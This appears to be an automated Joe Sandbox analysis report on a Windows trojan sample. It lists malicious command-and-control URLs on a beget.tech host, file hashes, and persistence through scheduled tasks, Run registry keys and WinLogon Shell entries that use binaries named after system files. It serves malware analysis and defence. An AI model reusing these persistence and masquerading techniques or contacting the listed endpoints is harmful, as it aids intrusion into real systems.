http://arabna4a.beget.tech/L1nc0In.php?2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB	100%	Avira URL Cloud	malware
http://arabna4a.beget.tech/L1nc0In.php?VP=Y0sUyEySXbH7qzhU&uKbMX6B06ERe3aQWDvs=Bo&ams92FdC1fIRKyQB4rd2=hxdB0kmEyUiFiAjo6IucBZ8uJFiwtyT&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&VP=Y0sUyEySXbH7qzhU&uKbMX6B06ERe3aQWDvs=Bo&ams92FdC1fIRKyQB4rd2=hxdB0kmEyUiFiAjo6IucBZ8uJFiwtyT	100%	Avira URL Cloud	malware
http://arabna4a.beget.tech	100%	Avira URL Cloud	malware
http://arabna4a.beget.tech/L1nc0In.php?BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t	100%	Avira URL Cloud	malware
http://arabna4a.beget.tech/L1nc0In.php?WKvP6A2Jn=stWSjLwNRGLKoK&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&WKvP6A2Jn=stWSjLwNRGLKoK	100%	Avira URL Cloud	malware
http://arabna4a.beget.tech/	100%	Avira URL Cloud	malware
http://arabna4a.beget.tech/L1nc0In.php?XuV9nTU0UPEK42MPVtkxIO=l5DIGMVlApaiv&UwLFN=he96MM2hRMugIXuEkLNo8nEf&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&XuV9nTU0UPEK42MPVtkxIO=l5DIGMVlApaiv&UwLFN=he96MM2hRMugIXuEkLNo8nEf	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
arabna4a.beget.tech	5.101.153.201	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://arabna4a.beget.tech/L1nc0In.php?BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t	true	Avira URL Cloud: malware	unknown
http://arabna4a.beget.tech/L1nc0In.php?VP=Y0sUyEySXbH7qzhU&uKbMX6B06ERe3aQWDvs=Bo&ams92FdC1fIRKyQB4rd2=hxdB0kmEyUiFiAjo6IucBZ8uJFiwtyT&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&VP=Y0sUyEySXbH7qzhU&uKbMX6B06ERe3aQWDvs=Bo&ams92FdC1fIRKyQB4rd2=hxdB0kmEyUiFiAjo6IucBZ8uJFiwtyT	true	Avira URL Cloud: malware	unknown
http://arabna4a.beget.tech/L1nc0In.php?ouI9hzqbhep5GUmX0eUaWez4Lojvj=luzWjVi&AAhu=RU&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&ouI9hzqbhep5GUmX0eUaWez4Lojvj=luzWjVi&AAhu=RU	true	Avira URL Cloud: malware	unknown
http://arabna4a.beget.tech/L1nc0In.php?gXDzKre6VVRBWAoGI=jPJ3UfJdDNtSj71Mwf&5qI3u1xRIQeSri2anXnDhproQ=CwUJKOJU&2aVYBgOB=j5BurgOz&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&gXDzKre6VVRBWAoGI=jPJ3UfJdDNtSj71Mwf&5qI3u1xRIQeSri2anXnDhproQ=CwUJKOJU&2aVYBgOB=j5BurgOz	true	Avira URL Cloud: malware	unknown
http://arabna4a.beget.tech/L1nc0In.php?n6h7L24FVf9j22S6=KanaE3aKNLBhD&FI3Wr790F1Otj5zl=Xh6n50&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&n6h7L24FVf9j22S6=KanaE3aKNLBhD&FI3Wr790F1Otj5zl=Xh6n50	true	Avira URL Cloud: malware	unknown
http://arabna4a.beget.tech/L1nc0In.php?2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&2ClU1mdy4=ibGGARR9W&WIeFFV2nEILd0=5WNPuSwrjKZ9lMVmIpUY2tifOgt0&wEEkOKnEBPEkojTqGtqRc9gJ=9LyrBNj68wGVZXB	true	Avira URL Cloud: malware	unknown
http://arabna4a.beget.tech/L1nc0In.php?WKvP6A2Jn=stWSjLwNRGLKoK&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&WKvP6A2Jn=stWSjLwNRGLKoK	true	Avira URL Cloud: malware	unknown
http://arabna4a.beget.tech/L1nc0In.php?XuV9nTU0UPEK42MPVtkxIO=l5DIGMVlApaiv&UwLFN=he96MM2hRMugIXuEkLNo8nEf&f5a5591337f396c8e5544331b64f65d7=9e03c306f146d874758e1b06d8ed5e1c&028645efdb15fae0707a0f18ad679baf=QM2kjMhdDNidzY2MGOwEzMlVGNkN2NmlTN5EWYmZmZ1QTY1Q2YhVGN&XuV9nTU0UPEK42MPVtkxIO=l5DIGMVlApaiv&UwLFN=he96MM2hRMugIXuEkLNo8nEf	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://arabna4a.beget.tech	ApplicationFrameHost.exe, 00000032.00000002.1437153809.000000000366A000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 00000032.00000002.1437153809.0000000003674000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 00000032.00000002.1437153809.000000000363E000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 00000032.00000002.1437153809.0000000003682000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://g.live.com/odclientsettings/Prod1C:	svchost.exe, 00000039.00000003.1339338983.000002A4B4929000.00000004.00000800.00020000.00000000.sdmp	false		high
http://arabna4a.beget.tech/	ApplicationFrameHost.exe, 00000032.00000002.1437153809.0000000003631000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 00000032.00000002.1437153809.0000000003682000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000002E.00000002.1520790264.00000229E74F7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://arabna4a.beget.tech/L1nc0In.php?BbgPmrREGT0y5DQp73CC1=ZUJgx0hpXQufn9IoPZ0hIbOJQ8t&f5a5591337f	ApplicationFrameHost.exe, 00000032.00000002.1437153809.000000000363E000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 00000032.00000002.1437153809.0000000003682000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000001A.00000002.1542277018.0000014015FC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1497198467.0000017780226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1504403127.000001E400225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1540280803.000002431C947000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1551198149.0000011899C06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1506410434.0000021F002E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1548965652.000001D445657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1499962461.0000021B80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1500611895.0000015480227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1564146390.000002398904C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1539543893.000001CD9D1D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1520790264.00000229E74F7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000002E.00000002.1520790264.00000229E74F7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000001A.00000002.1542277018.0000014015FC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1497198467.0000017780226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1504403127.000001E400225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1540280803.000002431C947000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1551198149.0000011899C06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1506410434.0000021F002E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1548965652.000001D445657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1499962461.0000021B80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1500611895.0000015480227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1564146390.000002398904C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1539543893.000001CD9D1D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1520790264.00000229E74F7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 00000039.00000003.1339338983.000002A4B48D0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 0000001A.00000002.1542277018.0000014015DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1497198467.0000017780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1504403127.000001E400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1540280803.000002431C6B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1551198149.00000118999E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1506410434.0000021F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1548965652.000001D445431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1499962461.0000021B80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1500611895.0000015480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1564146390.0000023988DB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1539543893.000001CD9CFB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1520790264.00000229E72E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	cvXu2RR10n.exe, 00000000.00000002.1329052019.0000000003763000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1542277018.0000014015DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1497198467.0000017780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1504403127.000001E400001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1540280803.000002431C6B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1551198149.00000118999E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.1506410434.0000021F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1548965652.000001D445431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.1499962461.0000021B80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1500611895.0000015480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.1564146390.0000023988DB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1539543893.000001CD9CFB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.1520790264.00000229E72E2000.00000004.00000800.00020000.00000000.sdmp, ApplicationFrameHost.exe, 00000032.00000002.1437153809.000000000363E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000002E.00000002.1520790264.00000229E74F7000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
5.101.153.201	arabna4a.beget.tech	Russian Federation		198610	BEGET-ASRU	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587274
Start date and time:	2025-01-10 02:26:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	64
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	cvXu2RR10n.exe renamed because original name is a hash value
Original Sample Name:	97a026b442f5d5739ea3d8565f3a044d.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@54/75@1/2
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, SgrmBroker.exe, schtasks.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.23.242.162, 13.107.246.45, 20.109.210.53
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target ApplicationFrameHost.exe, PID 9516 because it is empty
Execution Graph export aborted for target cvXu2RR10n.exe, PID 7420 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:27:08	Task Scheduler	Run new task: ApplicationFrameHost path: "C:\Users\user\Music\ApplicationFrameHost.exe"
02:27:08	Task Scheduler	Run new task: ApplicationFrameHostA path: "C:\Users\user\Music\ApplicationFrameHost.exe"
02:27:08	Task Scheduler	Run new task: vAJjQbsDlJtvByBkfqttADkNAptf path: "C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe"
02:27:09	Task Scheduler	Run new task: vAJjQbsDlJtvByBkfqttADkNAptfv path: "C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe"
02:27:11	Task Scheduler	Run new task: RuntimeBroker path: "C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe"
02:27:11	Task Scheduler	Run new task: RuntimeBrokerR path: "C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe"
02:27:11	Task Scheduler	Run new task: smartscreen path: "C:\Recovery\smartscreen.exe"
02:27:11	Task Scheduler	Run new task: smartscreens path: "C:\Recovery\smartscreen.exe"
02:27:11	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost "C:\Users\user\Music\ApplicationFrameHost.exe"
02:27:21	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run vAJjQbsDlJtvByBkfqttADkNAptf "C:\Recovery\vAJjQbsDlJtvByBkfqttADkNAptf.exe"
03:37:10	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe"
03:37:18	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run smartscreen "C:\Recovery\smartscreen.exe"
03:37:27	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost "C:\Users\user\Music\ApplicationFrameHost.exe"
03:37:35	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run vAJjQbsDlJtvByBkfqttADkNAptf "C:\Recovery\vAJjQbsDlJtvByBkfqttADkNAptf.exe"
03:37:44	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe"
03:37:52	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run smartscreen "C:\Recovery\smartscreen.exe"
03:38:01	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost "C:\Users\user\Music\ApplicationFrameHost.exe"
03:38:11	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run vAJjQbsDlJtvByBkfqttADkNAptf "C:\Recovery\vAJjQbsDlJtvByBkfqttADkNAptf.exe"
03:38:19	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe"
03:38:27	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run smartscreen "C:\Recovery\smartscreen.exe"
03:38:44	Autostart	Run: WinLogon Shell "C:\Users\user\Music\ApplicationFrameHost.exe"
03:38:53	Autostart	Run: WinLogon Shell "C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe"
03:39:01	Autostart	Run: WinLogon Shell "C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe"
03:39:09	Autostart	Run: WinLogon Shell "C:\Recovery\smartscreen.exe"
03:39:18	Autostart	Run: WinLogon Shell "C:\Recovery\vAJjQbsDlJtvByBkfqttADkNAptf.exe"
20:27:13	API Interceptor	382x Sleep call for process: powershell.exe modified
20:27:14	API Interceptor	2x Sleep call for process: svchost.exe modified
20:27:19	API Interceptor	4x Sleep call for process: ApplicationFrameHost.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BEGET-ASRU	VDoUCMbcmz.exe	Get hash	malicious	DCRat	Browse	5.101.152.15
	00DsMTECub.exe	Get hash	malicious	DCRat	Browse	5.101.152.15
	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	45.130.41.107
	jmBb9uY1B8.exe	Get hash	malicious	DCRat	Browse	5.101.152.15
	spc.elf	Get hash	malicious	Mirai, Moobot	Browse	193.168.46.136
	oFAjWuoHBq.exe	Get hash	malicious	DCRat	Browse	5.101.152.15
	Setup.exe	Get hash	malicious	Vidar	Browse	45.130.41.93
	Setup.exe	Get hash	malicious	Vidar	Browse	45.130.41.93
	xoJxSAotVM.exe	Get hash	malicious	Vidar	Browse	5.101.153.57
	botnet.x86.elf	Get hash	malicious	Mirai, Moobot	Browse	185.155.118.34

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x42258267, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6650726091144356
Encrypted:	false
SSDEEP:	1536:dSB2ESB2SSjlK/2502y0IEWBqbMo5g5+Ykr3g16z2UPkLk+kK+UJ8xUJSSiWjFjF:dazaU+uroc2U5Si6
MD5:	5D49E08C12646BC46F7BE4B26266D6EC
SHA1:	AE6A7E02B98484045E18803853665AFCC8CF14FD
SHA-256:	538061B04FACEC028CB758E27E5B4AB71622A3932E18A9295001B942E8C9DE0C
SHA-512:	5C0CACC60A1840968BC2411BF55E772AC84A4805174A1B74E0ED9BD6CFE9F25907674CD47989CFE274463407D38731599666F473EBA322FD956A9BFBF7EDA4FB
Malicious:	false
Preview:	B%.g... .......#.......X\...;...{......................0.e..........}W......}#.h.b..........}W.0.e.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..........................................}W..................G.......}W..........................#......0.e.....................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\2afe4ed40d5a86

Download File

Process:	C:\Users\user\Desktop\cvXu2RR10n.exe
File Type:	ASCII text, with very long lines (301), with no line terminators
Category:	dropped
Size (bytes):	301
Entropy (8bit):	5.813885649769949
Encrypted:	false
SSDEEP:	6:jlruo/NZdF40nDSONa7kVqSpMNkOhqyLKgAnDNuV02BcBYXKAXxzEhn:ZruoFPFrOOM7kQfiOhqyeVJulBcBYDxu
MD5:	0F3FCBBE54AC61A98733B03FCFE3FCAA
SHA1:	03D6420C44AFB20FF30F98B478A96BB0B4EB159C
SHA-256:	F69CB34BA8F892AD7359E94C2E0419B8B512CD10350D04E4777B07D444BAA961
SHA-512:	67EE382D045DFD4013CFAF88F310D8154E3B0A7E82BB76227A1CE94638CC39F1ACD9EDE44BDAA777181690FE147991B14D3BD0893DE98BCF614262AEC37B1602
Malicious:	false
Preview:	DWkfCwtAMTMMxz8U74dhyupTOQ7KZLql1LpQeIzfC4kRxUs1X62ooUeSqQQwzjkBmlUmJs0zF8f3JYg4iGwdSC7hrWjO1CqcTjoMAFrpFDjqykISuWOtwHskow5xIl7CRCkjtT4cYHXPdQsGNQdfx7pL1EiNJ4geFgZw9jjabvUpucGXEyj2HcOUWYsovrSel3J616GorDDCmAbY7KIUUnWnRFZk04puc0D1TKgIs5LEYMrW7Urki8K7hgpwggywXTjw6kFxoAmZcRPFXDngNFLeqGUwftlLHYqEn5ZXO35hV

C:\Recovery\7aa03be75bb09d

Download File

Process:	C:\Users\user\Desktop\cvXu2RR10n.exe
File Type:	ASCII text, with very long lines (881), with no line terminators
Category:	dropped
Size (bytes):	881
Entropy (8bit):	5.888221659420057
Encrypted:	false
SSDEEP:	24:hZV8UVb37ilBxAXThl81GGmTmxrsXMnhu5Rw71nPTYp:RpL2xAXVlx3XMhSRs1kp
MD5:	0A01ACDC44A1610C0F8D353E194FB5B0
SHA1:	5763E295188657CFE50C63B52DAC14227EC2BCE7
SHA-256:	8D14DC68BD3712B36079E2D7216361A900993205D01997210AA83322BE6B1D85
SHA-512:	11E0556BD627357F9A5479A298F4083933756A5F877E08EDED0B8E701D9B994D5AFE6176E5E40681BC134A7548F579B740688099DE504470C4B28E8A5E976EEB
Malicious:	false
Preview:	RjSIEG0QSS5ZaREkKbcnQRTJnJ5lEf5VHTzzY6jyjH6lAI4dapGI6zmAPIe5LOLwXjRHcPMO2nEIVsJfObKZZwYRqzjPbonU5JOa0xALd2QSvdoh99qtDwWkK9anq6wO9tNLdsobb95hgGgNKBQc74QJxnP0WXfgFBSBQdEQUPRE0zEEdNcopTQEcDY0dxEDeYbexe6r7AHsnMS7jKXJ401wvOjMENwhKNjbXjR8RvrpMibQvaQSa5Iohptj5tntNkhZm0j93Y2JIMkMwTbn7eGPF54s0sDhI8blACn51RYBD8fVFgwlS9wsdSUr61ILUUBKu8MuqgwpFFLGainU5bPIMsIrs58AIMrs6UlGTC5wMGnYGNQXNyQ2F38BzeCuhwh2XdJF7gA3gd5FFukeplwT6ynDWjRzALOajuAnELZqyWWm725F4hF5AN5jzFtXPL3UOfgVt7adLFfkcBGdoL4cGSaWybx8cCbmdBXbWkV7Hlu4rVHy9PtDQaO5FKhSJbBJo3HanoGEz7VeifocU89MTXWCxbVMCDxqkkPyOqLUIoOSFtWjfE8Kby0RgFnLT4BwKo48Q0OnxpDoJD6DFvr8FnOvt8RJD9BOnbIbzYTo0UWwuMIdIjGhNDrhZIOSjFjyozAr5fOqcCHuQcBhzyAe2dBkulBqJAFvuhH5LahnUZEK56Q7HrcuFF6Kxa7Udihb6W9sVGVZQWJcY0oxUEjciUqpl6IvdNJw2nOi7hlBVDes5dv6vJ9Z8E3lqTHY7k5DMXjvmG0xciGe07uILL9TNtxxtn1naNDvHafh3AUoTM7a8Yutj8NwkmzckvB9OMWOfVXabMOK1UABwWzV2IDbAQKfkD7H8UaGzt5mAURXtC4Pl

C:\Recovery\smartscreen.exe

Download File

Process:	C:\Users\user\Desktop\cvXu2RR10n.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2691584
Entropy (8bit):	7.668413616367881
Encrypted:	false
SSDEEP:	49152:cVtVRFA8evMabRZgEVjPW8bfBodneUXBXw7YKdy2043sjkH:cNR/eUab3W8todenPJcjk
MD5:	97A026B442F5D5739EA3D8565F3A044D
SHA1:	DD409FA09EEDE943173F5AED10542F378062DCB1
SHA-256:	37AFDC07792FE92B790BD6BA935889CEF87B699D9F1A8F86336076F8CF6E4B72
SHA-512:	007B12F6C721AD9681C2013AC0038A23B1DC4BC2FB87C779E85970E820D5F4735C962F05A378ECE3A0F23E4288172CCC43B634DFFDC12A636673852884DD297D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb..................(..6......~.(.. ....)...@.. ........................)...........@.................................0.(.K....@)......................`)...................................................... ............... ..H............text.....(.. ....(................. ..`.sdata.../....)..0....(.............@....rsrc........@).......).............@..@.reloc.......`).......).............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\smartscreen.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\cvXu2RR10n.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Recovery\vAJjQbsDlJtvByBkfqttADkNAptf.exe

Download File

Process:	C:\Users\user\Desktop\cvXu2RR10n.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2691584
Entropy (8bit):	7.668413616367881
Encrypted:	false
